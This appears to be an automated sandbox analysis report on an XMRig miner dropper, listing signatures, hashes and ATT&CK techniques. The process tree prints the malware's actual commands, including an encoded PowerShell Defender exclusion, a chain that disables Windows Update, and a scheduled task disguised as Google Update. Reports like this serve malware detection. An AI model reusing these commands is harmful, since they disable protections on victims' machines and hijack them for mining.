Analysis

  • max time kernel
    301s
  • max time network
    297s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    28-06-2022 22:15

General

  • Target

    00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe

  • Size

    7.4MB

  • MD5

    360b1e11f8ab2a718f56a4fe23f9c846

  • SHA1

    4be3649ba2def716aa970e2b84b7e4b12215cf85

  • SHA256

    00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea

  • SHA512

    4b111c5116c8636e0d374abf83b489a4d04bb3eb71bd624051aaafeeb6f2cb41ae717fda875c51f558a957b811818729e51f32cfb391a8c5a99c23b3486c7795

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 13 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 8 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 46 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe
    "C:\Users\Admin\AppData\Local\Temp\00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1884
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:932
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
          PID:1932
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG4AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABhAHoAIwA+AA=="
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1636
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -EncodedCommand "PAAjAG4AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABhAHoAIwA+AA=="
              5⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:912
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2000
            • C:\Windows\system32\sc.exe
              sc stop UsoSvc
              5⤵
              • Launches sc.exe
              PID:1260
            • C:\Windows\system32\sc.exe
              sc stop WaaSMedicSvc
              5⤵
              • Launches sc.exe
              PID:300
            • C:\Windows\system32\sc.exe
              sc stop wuauserv
              5⤵
              • Launches sc.exe
              PID:628
            • C:\Windows\system32\sc.exe
              sc stop bits
              5⤵
              • Launches sc.exe
              PID:1560
            • C:\Windows\system32\sc.exe
              sc stop dosvc
              5⤵
              • Launches sc.exe
              PID:1440
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
              5⤵
              • Modifies registry key
              PID:804
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
              5⤵
              • Modifies registry key
              PID:1112
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
              5⤵
              • Modifies security service
              • Modifies registry key
              PID:1892
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
              5⤵
              • Modifies registry key
              PID:828
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
              5⤵
              • Modifies registry key
              PID:1776
            • C:\Windows\system32\takeown.exe
              takeown /f C:\Windows\System32\WaaSMedicSvc.dll
              5⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:920
            • C:\Windows\system32\icacls.exe
              icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
              5⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:1088
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:1608
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:1776
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:1396
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:836
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
              5⤵
                PID:1984
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                5⤵
                  PID:1556
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                  5⤵
                    PID:1632
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                    5⤵
                      PID:1636
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                      5⤵
                        PID:628
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                        5⤵
                          PID:572
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                          5⤵
                            PID:1112
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1184
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -hibernate-timeout-ac 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:572
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -hibernate-timeout-dc 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:912
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -standby-timeout-ac 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1980
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -standby-timeout-dc 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1168
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                          4⤵
                            PID:1996
                            • C:\Windows\system32\schtasks.exe
                              schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                              5⤵
                              • Creates scheduled task(s)
                              PID:868
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                            4⤵
                              PID:1256
                              • C:\Windows\system32\schtasks.exe
                                schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                5⤵
                                  PID:568
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c ""C:\Windows\Temp\run.bat" "
                            2⤵
                            • Drops startup file
                            PID:300
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c ""C:\Windows\Temp\lol.bat" "
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1432
                            • C:\Program Files\Internet Explorer\iexplore.exe
                              "C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
                              3⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SetWindowsHookEx
                              • Suspicious use of WriteProcessMemory
                              PID:980
                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:980 CREDAT:275457 /prefetch:2
                                4⤵
                                • Modifies Internet Explorer settings
                                • Suspicious use of SetWindowsHookEx
                                PID:1588
                        • C:\Windows\system32\taskeng.exe
                          taskeng.exe {A25A9F97-9E56-419D-B620-9F57B8F956F7} S-1-5-18:NT AUTHORITY\System:Service:
                          1⤵
                            PID:1160
                            • C:\Program Files\Chrome\updater.exe
                              "C:\Program Files\Chrome\updater.exe"
                              2⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:300
                              • C:\Windows\System32\conhost.exe
                                "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                                3⤵
                                • Drops file in Drivers directory
                                • Suspicious use of SetThreadContext
                                • Drops file in Program Files directory
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:628
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG4AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABhAHoAIwA+AA=="
                                  4⤵
                                    PID:368
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -EncodedCommand "PAAjAG4AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABhAHoAIwA+AA=="
                                      5⤵
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1592
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                    4⤵
                                      PID:1248
                                      • C:\Windows\system32\sc.exe
                                        sc stop UsoSvc
                                        5⤵
                                        • Launches sc.exe
                                        PID:1556
                                      • C:\Windows\system32\sc.exe
                                        sc stop WaaSMedicSvc
                                        5⤵
                                        • Launches sc.exe
                                        PID:1396
                                      • C:\Windows\system32\sc.exe
                                        sc stop wuauserv
                                        5⤵
                                        • Launches sc.exe
                                        PID:1656
                                      • C:\Windows\system32\sc.exe
                                        sc stop bits
                                        5⤵
                                        • Launches sc.exe
                                        PID:1184
                                      • C:\Windows\system32\sc.exe
                                        sc stop dosvc
                                        5⤵
                                        • Launches sc.exe
                                        PID:912
                                      • C:\Windows\system32\reg.exe
                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                        5⤵
                                        • Modifies registry key
                                        PID:1112
                                      • C:\Windows\system32\reg.exe
                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                        5⤵
                                        • Modifies registry key
                                        PID:368
                                      • C:\Windows\system32\reg.exe
                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                        5⤵
                                        • Modifies registry key
                                        PID:1432
                                      • C:\Windows\system32\reg.exe
                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                        5⤵
                                        • Modifies registry key
                                        PID:1396
                                      • C:\Windows\system32\reg.exe
                                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                        5⤵
                                        • Modifies registry key
                                        PID:1220
                                      • C:\Windows\system32\takeown.exe
                                        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                        5⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1660
                                      • C:\Windows\system32\icacls.exe
                                        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                        5⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        PID:836
                                      • C:\Windows\system32\reg.exe
                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                        5⤵
                                        • Modifies registry key
                                        PID:1576
                                      • C:\Windows\system32\reg.exe
                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                        5⤵
                                        • Modifies registry key
                                        PID:1132
                                      • C:\Windows\system32\reg.exe
                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                        5⤵
                                        • Modifies registry key
                                        PID:1632
                                      • C:\Windows\system32\reg.exe
                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                        5⤵
                                        • Modifies registry key
                                        PID:856
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                        5⤵
                                          PID:912
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                          5⤵
                                            PID:1556
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                            5⤵
                                              PID:368
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                              5⤵
                                                PID:1168
                                              • C:\Windows\system32\schtasks.exe
                                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                5⤵
                                                  PID:828
                                                • C:\Windows\system32\schtasks.exe
                                                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                  5⤵
                                                    PID:1516
                                                  • C:\Windows\system32\schtasks.exe
                                                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                    5⤵
                                                      PID:1268
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                    4⤵
                                                      PID:1548
                                                      • C:\Windows\system32\powercfg.exe
                                                        powercfg /x -hibernate-timeout-ac 0
                                                        5⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:828
                                                      • C:\Windows\system32\powercfg.exe
                                                        powercfg /x -hibernate-timeout-dc 0
                                                        5⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1256
                                                      • C:\Windows\system32\powercfg.exe
                                                        powercfg /x -standby-timeout-ac 0
                                                        5⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1268
                                                      • C:\Windows\system32\powercfg.exe
                                                        powercfg /x -standby-timeout-dc 0
                                                        5⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:548
                                                    • C:\Windows\System32\conhost.exe
                                                      C:\Windows\System32\conhost.exe
                                                      4⤵
                                                        PID:1184
                                                        • C:\Windows\System32\conhost.exe
                                                          "C:\Windows\System32\conhost.exe" "lnftwwoznl"
                                                          5⤵
                                                            PID:1624
                                                        • C:\Windows\explorer.exe
                                                          C:\Windows\explorer.exe jfkojmuoois1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1316

                                                  Network

                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                  Execution

                                                  Scheduled Task

                                                  1
                                                  T1053

                                                  Persistence

                                                  Modify Existing Service

                                                  2
                                                  T1031

                                                  Scheduled Task

                                                  1
                                                  T1053

                                                  Privilege Escalation

                                                  Scheduled Task

                                                  1
                                                  T1053

                                                  Defense Evasion

                                                  Modify Registry

                                                  3
                                                  T1112

                                                  Virtualization/Sandbox Evasion

                                                  1
                                                  T1497

                                                  Impair Defenses

                                                  1
                                                  T1562

                                                  File Permissions Modification

                                                  1
                                                  T1222

                                                  Discovery

                                                  Query Registry

                                                  2
                                                  T1012

                                                  Virtualization/Sandbox Evasion

                                                  1
                                                  T1497

                                                  System Information Discovery

                                                  3
                                                  T1082

                                                  Impact

                                                  Service Stop

                                                  1
                                                  T1489

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                    Filesize

                                                    60KB

                                                    MD5

                                                    589c442fc7a0c70dca927115a700d41e

                                                    SHA1

                                                    66a07dace3afbfd1aa07a47e6875beab62c4bb31

                                                    SHA256

                                                    2e5cb72e9eb43baafb6c6bfcc573aac92f49a8064c483f9d378a9e8e781a526a

                                                    SHA512

                                                    1b5fa79e52be495c42cf49618441fb7012e28c02e7a08a91da9213db3ab810f0e83485bc1dd5f625a47d0ba7cfcdd5ea50acc9a8dcebb39f048c40f01e94155b

                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                    Filesize

                                                    304B

                                                    MD5

                                                    e9fbf49dc7e9283a246cf25eddfca152

                                                    SHA1

                                                    ae2daf728e6a2b699cb878219f9949ae7c8432ef

                                                    SHA256

                                                    b4a15b3ccac9d2f3075e684fa6cfd9d36ae7c496d97e19ed4cabac32d474aed4

                                                    SHA512

                                                    16679cdf1e8ac73f1430708f5380e4fd2d5d09fffc5739d7633b500048fcccc04935bfe05a82c5a549f358ad834686dce75fefd0f7cca509fa55143235ae8ecb

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\YUWJMOAK.txt
                                                    Filesize

                                                    608B

                                                    MD5

                                                    3b6a545d2451c47ad172342b86f7d687

                                                    SHA1

                                                    08d0f887ba76e5b8a8b7b3b931ff11de5b1bd357

                                                    SHA256

                                                    2dfa556f60fb99de221d4d0280b91681b277b95b7b8743f1211981120244b88e

                                                    SHA512

                                                    ecbdfe2efd8dce9592e6b9b6f7ddcb7fad86aa361d9d8cefd465bae7882e17ff3980364ae9062f9b46bdc121cd8695155b84a389e327010d600c3656505eb3ee

                                                  • C:\Windows\Temp\lol.bat
                                                    Filesize

                                                    59B

                                                    MD5

                                                    f580e0e80cc87b25e38ea2c0c8059d04

                                                    SHA1

                                                    299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                    SHA256

                                                    9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                    SHA512

                                                    5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                                  • C:\Windows\Temp\run.bat
                                                    Filesize

                                                    98B

                                                    MD5

                                                    731afe244b2414169a5f630d52646e56

                                                    SHA1

                                                    e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                    SHA256

                                                    6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                    SHA512

                                                    84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                                  • C:\Windows\Temp\setup.exe
                                                    Filesize

                                                    7.2MB

                                                    MD5

                                                    34114ac92707af5ed0825e37be5e7fb0

                                                    SHA1

                                                    0b52506b481afbe89682f50285ad4c79b9ead2e3

                                                    SHA256

                                                    9082d70100ed1473306f6ee39fa96078bab56a11a92efee2c8ae1a75ef307e47

                                                    SHA512

                                                    44182a3ebfe68f2b1acc012fc89328b709ab64f896d3a875837dc97ca900e31d0180140ec77a7d194b0af94360b8b988bf706379ab26e6cada390a75a0588d0f

                                                  • \Windows\Temp\setup.exe
                                                    Filesize

                                                    7.2MB

                                                    MD5

                                                    34114ac92707af5ed0825e37be5e7fb0

                                                    SHA1

                                                    0b52506b481afbe89682f50285ad4c79b9ead2e3

                                                    SHA256

                                                    9082d70100ed1473306f6ee39fa96078bab56a11a92efee2c8ae1a75ef307e47

                                                    SHA512

                                                    44182a3ebfe68f2b1acc012fc89328b709ab64f896d3a875837dc97ca900e31d0180140ec77a7d194b0af94360b8b988bf706379ab26e6cada390a75a0588d0f

                                                  • memory/300-111-0x0000000000400000-0x000000000106D000-memory.dmp
                                                    Filesize

                                                    12.4MB

                                                  • memory/300-59-0x0000000000000000-mapping.dmp
                                                  • memory/300-112-0x0000000077420000-0x00000000775C9000-memory.dmp
                                                    Filesize

                                                    1.7MB

